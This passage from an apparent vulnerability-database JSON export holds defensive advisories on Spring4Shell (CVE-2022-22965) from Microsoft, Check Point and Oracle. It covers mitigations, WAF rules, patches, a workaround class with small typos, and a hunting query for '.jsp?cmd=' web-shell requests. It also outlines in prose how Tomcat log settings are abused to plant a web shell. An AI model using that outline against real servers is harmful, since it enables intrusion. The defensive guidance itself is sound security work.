**Prefix: **The prefix of the access log file name\n 3. **Suffix: **The suffix of the access log file name. The log file name is a concatenation of the prefix with the suffix.\n 4. **Pattern: **A string that describes the log record structure. This can be manipulated so that each record will essentially contain a JSP web shell.\n 5. **FileDateFormat:** Setting this causes the new access log settings to take effect.\n\nOnce the web shell is dropped on the server, the attacker can execute commands on the server as Tomcat.\n\n## Discovery and mitigations\n\n### How to find vulnerable devices\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/threat-protection/endpoint-defender>) monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities. \n\nCustomers can now search for CVE-2022-22965 to find vulnerable devices through the [Weaknesses](<https://securitycenter.microsoft.com/vulnerabilities?search=CVE-2022-22965>) page in threat and vulnerability management.\n\nFigure 4. Weaknesses page in Microsoft Defender for Endpoint\n\n### Enhanced protection with Azure Firewall Premium\n\nCustomers using [Azure Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-migrate>) have enhanced protection from the SpringShell CVE-2022-22965 vulnerability and exploits. Azure Firewall Premium Intrusion Detection and Prevention System (IDPS) provides IDPS inspection for all east-west traffic, outbound traffic to the internet, and inbound HTTP traffic from the internet. The vulnerability rulesets are continuously updated and include vulnerability protection for SpringShell since March 31, 2022. The screenshot below shows all the scenarios which are actively mitigated by Azure Firewall Premium.\n\nConfigure Azure Firewall Premium with both IDPS Alert & Deny mode and TLS inspection enabled for proactive protection against CVE-2022-22965 exploit. \n\nFigure 5. Azure Firewall Premium portal detecting CVE-2022-22965 exploitation attempts.\n\nCustomers using Azure Firewall Standard can migrate to Premium by following [these directions](<https://docs.microsoft.com/azure/firewall/premium-migrate>). Customers new to Azure Firewall Premium can learn more about [Firewall Premium](<https://docs.microsoft.com/azure/firewall/premium-features>).\n\n### Detect and protect with Azure Web Application Firewall (Azure WAF)\n\nAzure Web Application Firewall (WAF) customers with Azure Front Door and Azure Application Gateway deployments now have enhanced protection for the SpringShell exploit - [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and other high impact Spring vulnerabilities [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>) and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>). To help detect and mitigate these critical Spring vulnerabilities, we have released four new rules.\n\n#### Global WAF with Azure Front Door\n\nAzure WAF has updated Default Rule Set (DRS) versions 2.0/1.1/1.0.\n\n * Rule group: _MS-ThreatIntel-WebShells_, Rule Id: 99005006 - Spring4Shell Interaction Attempt\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001014 - Attempted Spring Cloud routing-expression injection (CVE-2022-22963)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001015 - Attempted Spring Framework unsafe class object exploitation (CVE-2022-22965)\n * Rule group: _MS-ThreatIntel-CVEs_, Rule Id: 99001016 - Attempted Spring Cloud Gateway Actuator injection (CVE-2022-22947)\n\nWAF rules on Azure Front Door are disabled by default on existing Microsoft managed rule sets.\n\nFigure 6. Screenshot of WAF Spring vulnerabilities\n\n#### Regional WAF with Azure Application Gateway\n\nAzure WAF has updated OWASP Core Rule Set (CRS) versions for Azure Application Gateway WAF V2 regional deployments. New rules are under _Known_CVEs_ rule group:\n\n * Rule Id: 800110 - _Spring4Shell Interaction Attempt_\n * Rule Id: 800111 - _Attempted Spring Cloud routing-expression injection_ - CVE-2022-22963\n * Rule Id: 800112 - _Attempted Spring Framework unsafe class object exploitation_ - CVE-2022-22965\n * Rule Id: 800113 - _Attempted Spring Cloud Gateway Actuator injection_ - CVE-2022-22947\n\nWAF rules on Azure Application Gateway are _enabled_ by default for supported CRS versions.\n\nFigure 7. Spring vulnerability rules for Azure Application Gateway OWASP Core Rule Set (CRS)\n\n**Recommendation**: Enable WAF SpringShell rules to get protection from these threats. We will continue to monitor threat patterns and modify the above rules in response to emerging attack patterns as required. \n\nFor more information about Managed Rules and Default Rule Set (DRS) on Azure Front Door, see the [Web Application Firewall DRS rule groups and rules documentation](<https://docs.microsoft.com/azure/web-application-firewall/afds/waf-front-door-drs>). For more information about Managed Rules and OWASP Core Rule Set (CRS) on Azure Application Gateway, see the [Web Application Firewall CRS rule groups and rules documentation](<https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules?tabs=owasp32>)\n\n### Patch information and workarounds\n\nCustomers are encouraged to apply these mitigations to reduce the impact of this threat. Check the recommendations card in Microsoft 365 Defender threat and vulnerability management for the deployment status of monitored mitigations.\n\n * An [update](<https://spring.io/blog/2022/03/31/spring-boot-2-6-6-available-now>) is available for CVE-2022-22965. Administrators should upgrade to versions 5.3.18 or later or 5.2.19 or later. If the patch is applied, no other mitigation is necessary.\n\nIf you\u2019re unable to patch CVE-2022-22965, you can implement this set of workarounds published by [Spring](<https://www.springcloud.io/post/2022-03/spring-framework-rce-early-announcement/#gsc.tab=0>):\n\n * Search the @InitBinder annotation globally in the application to see if the dataBinder.setDisallowedFields method is called in the method body. If the introduction of this code snippet is found, add `{\"class.*\",\"Class.*\",\"*.class.*\", \"*.Class.*\"}` to the original blacklist. (**Note:** If this code snippet is used a lot, it needs to be appended in each location.)\n * Add the following global class into the package where the Controller is located. Then recompile and test the project for functionality:\n \n \n import org.springframework.core.annotation.Order;\n import org.springframework.web.bind.WebDataBinder;\n import org.springframework.web.bind.annotation.ControllerAdvice;\n import org.springframework.web.bind.annotation.InitBinder;\n @ControllerAdvice\n @Order(10000)\n public class GlobalControllerAdvice{\n @InitBinder\n public void setAllowedFields(webdataBinder dataBinder){\n String[]abd=new string[]{\"class.*\",\"Class.*\",\"*.class.*\",\"*.Class.*\"};\n dataBinder.setDisallowedFields(abd);\n }\n }\n\n## Detections\n\n### Microsoft 365 Defender\n\n#### Endpoint detection and response (EDR)\n\nAlerts with the following title in the security center can indicate threat activity on your network:\n\n * Possible SpringShell exploitation\n\nThe following alerts for an observed attack, but might not be unique to exploitation for this vulnerability:\n\n * Suspicious process executed by a network service\n\n#### Antivirus\n\nMicrosoft Defender antivirus version **1.361.1234.0** or later detects components and behaviors related to this threat with the following detections:\n\n * Trojan:Python/SpringShellExpl\n * Exploit:Python/SpringShell\n * Backdoor:PHP/Remoteshell.V\n\n### Hunting\n\n#### Microsoft 365 Defender advanced hunting queries \n\nUse the query below to surface exploitation of CVE-2022-22965 on both victim devices and devices performing the exploitation. Note that this query only covers HTTP use of the exploitation and not HTTPS.\n \n \n DeviceNetworkEvents\n | where Timestamp > ago(7d)\n | where ActionType =~ \"NetworkSignatureInspected\"\n | where AdditionalFields contains \".jsp?cmd=\"\n | summarize makeset(AdditionalFields, 5), min(Timestamp), max(Timestamp) by DeviceId, DeviceName \n\n#### Microsoft Sentinel\n\nMicrosoft Sentinel customers can use the following queries to look for this threat activity:\n\n * [Possible SpringShell exploitation attempt (CVE-2022-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringShellExploitationAttempt.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible SpringShell exploitation attempt (CVE-2022-22965) to drop a malicious web shell in a location accessible by HTTP requests. Attackers then make requests to the malicious backdoor to run system commands.\n * [Possible web shell usage attempt related to SpringShell (CVE-2202-22965)](<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting Queries/AzureDiagnostics/SpringshellWebshellUsage.yaml>) \u2013 This hunting query looks in Azure Web Application Firewall data to find possible web shell usage related to SpringShell RCE vulnerability (CVE-2022-22965).\n * [AV detections related to SpringShell Vulnerability](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityAlert/AVSpringShell.yaml>) \u2013 This query looks for Microsoft Defender for Endpoint hits related to the SpringShell vulnerability. In Microsoft Sentinel, the _SecurityAlerts _table includes only the device name of the affected device. This query joins the _DeviceInfo _table to clearly connect other information such as device group, IP address, signed in users, and others. This allows the Microsoft Sentinel analyst to have more context related to the alert, if available.\n\n**Revision history**\n\n_[04/11/2022] \u2013 _Application Gateway now has enhanced protection for critical Spring vulnerabilities - [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), and [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>)._ _See _Detection and Mitigation section for details_.\n\n_[04/08/2022] \u2013 Azure Web Application Firewall (WAF) customers with Azure Front Door now has enhanced protection for Spring4Shell exploits - CVE-2022-22963, CVE-2022-22965, and CVE-2022-22947. See Detection and Mitigation section for details. \n[04/05/2022] \u2013 We added Microsoft Sentinel hunting queries to look for SpringShell exploitation activity._\n\nThe post [SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965](<https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2022-05-19T07:30:12", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22946>), [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>), and [CVE-2022-22950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22950>).\n\nOn March 31, 2022, a bypass to the fix for [CVE-2010-1622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned to [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). \nWe will continue to update you on any new development of this security event.\n\n### \nCheck Point Products Status\n\n**Notes:**\n\n * All Check Point software versions, including out of support versions, are not vulnerable.\n * All Check Point appliances are not vulnerable.\n\n### \nIPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the name of the CVE number.\n\n**Best Practice** \\- Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### \nHarmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### \nCloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T07:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T07:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2022-05-05T23:28:11", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories. \n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [ April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", "CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", "CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", "CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", "CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-05-04T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}